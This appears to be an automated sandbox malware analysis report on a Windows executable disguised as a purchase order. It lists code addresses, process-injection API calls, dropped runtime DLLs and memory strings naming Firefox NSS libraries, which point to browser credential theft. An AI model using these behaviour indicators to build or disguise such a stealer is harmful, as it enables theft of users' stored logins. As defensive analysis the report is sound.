Windows Analysis Report
PO No. 3200005919.exe

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_00404D90	1_2_00404D90
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_00406ABA	1_2_00406ABA
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412040B	1_2_0412040B
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04128C0B	1_2_04128C0B
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126C23	1_2_04126C23
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412045A	1_2_0412045A
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126C43	1_2_04126C43
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04124C96	1_2_04124C96
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412C48A	1_2_0412C48A
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041274A3	1_2_041274A3
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041204E0	1_2_041204E0
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126D15	1_2_04126D15
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412053A	1_2_0412053A
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120593	1_2_04120593
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041205DE	1_2_041205DE
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041275C9	1_2_041275C9
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120625	1_2_04120625
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126E66	1_2_04126E66
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04141EE6	1_2_04141EE6
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412071B	1_2_0412071B
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04144734	1_2_04144734
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0413FF6B	1_2_0413FF6B
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120792	1_2_04120792
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126F9D	1_2_04126F9D
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041207D5	1_2_041207D5
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041427C4	1_2_041427C4
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412081F	1_2_0412081F
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120001	1_2_04120001
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120006	1_2_04120006
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04122031	1_2_04122031
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120885	1_2_04120885
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041270D8	1_2_041270D8
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041200CA	1_2_041200CA
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041208F6	1_2_041208F6
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041200E1	1_2_041200E1
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041270E1	1_2_041270E1
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04128954	1_2_04128954
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120158	1_2_04120158
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412817D	1_2_0412817D
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120993	1_2_04120993
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041281A4	1_2_041281A4
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041209D9	1_2_041209D9
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04128A17	1_2_04128A17
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120A2B	1_2_04120A2B
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120A7A	1_2_04120A7A
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04127AB1	1_2_04127AB1
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0413FAB7	1_2_0413FAB7
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04128ADD	1_2_04128ADD
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041202C0	1_2_041202C0
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041432EB	1_2_041432EB
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412037C	1_2_0412037C
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04120395	1_2_04120395
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04124BBC	1_2_04124BBC
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04128BBD	1_2_04128BBD
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04126BD8	1_2_04126BD8
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 5_2_0168489C	5_2_0168489C

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04145617 NtResumeThread,		1_2_04145617
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041443B0 NtProtectVirtualMemory,		1_2_041443B0

Source: api-ms-win-core-synch-l1-2-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.5.dr	Static PE information: No import functions for PE file found

Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWMIMethod.dllL vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameqipcap.dll8 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7162736684.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
Source: PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs PO No. 3200005919.exe
